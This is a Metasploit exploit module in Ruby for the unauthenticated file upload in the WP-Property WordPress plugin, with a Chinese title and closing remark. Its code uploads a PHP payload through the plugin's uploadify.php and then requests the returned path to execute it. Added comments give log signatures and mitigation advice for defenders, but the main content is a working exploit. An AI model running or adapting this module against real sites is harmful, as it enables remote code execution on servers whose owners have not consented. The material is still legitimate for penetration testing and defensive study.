WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

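# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0, per the module description below). The plugin's
# bundled third-party/uploadify/uploadify.php accepts a multipart upload
# without authentication; the module then requests the path the server
# reports back for the uploaded file.
#
# Defender notes, derived from the requests this module sends:
# - Log signature: a POST to
#   <wordpress>/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
#   carrying a multipart "Filedata" part with a .php filename and a "folder"
#   part, followed by a GET for the returned path.
# - The payload is requested with :unlink_self, so the dropped file is
#   presumably removed once it has run; web-server access logs are likely a
#   more dependable artefact than the filesystem.
# - Mitigation: update the plugin to a release later than 1.35.0, remove or
#   block access to uploadify.php, and deny PHP execution in upload
#   directories.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers the module metadata (name, references, targets) and the
  # TARGETURI option that points at the WordPress installation.
  #
  # @param info [Hash] metadata passed in by the framework and merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the uploadify.php endpoint with a single GET request.
  #
  # NOTE(review): an HTTP 200 only shows that the file is reachable; no plugin
  # version is read, so a fixed or otherwise protected install may also be
  # reported as Appears. Confirm the installed WP-Property version before
  # treating this as a finding.
  #
  # @return [Exploit::CheckCode::Unknown] when there is no response or the status is not 200
  # @return [Exploit::CheckCode::Appears] when the endpoint answers with 200
  def check
    uri = target_uri.path
    # Appends in place, so the path string returned by target_uri is modified.
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  # Uploads a PHP payload through uploadify.php and then requests the location
  # the server returned for it.
  #
  # Calls fail_with(Exploit::Failure::UnexpectedReply) when the upload gets no
  # response, a non-200 status, or a body that does not mention the payload
  # file name.
  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    # Random five-letter file name; kept in an instance variable.
    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Two multipart fields: the file itself ("Filedata") and the destination
    # directory ("folder"), which is set to the uploadify directory.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Removes a CRLF that sits directly in front of a "--_Part_" boundary
    # marker at the start of a line; presumably the endpoint's multipart
    # parsing needs this form - TODO confirm.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used verbatim as the URI of the follow-up request.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end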

不要问我这写的是什么、怎么利用,我是说 msf。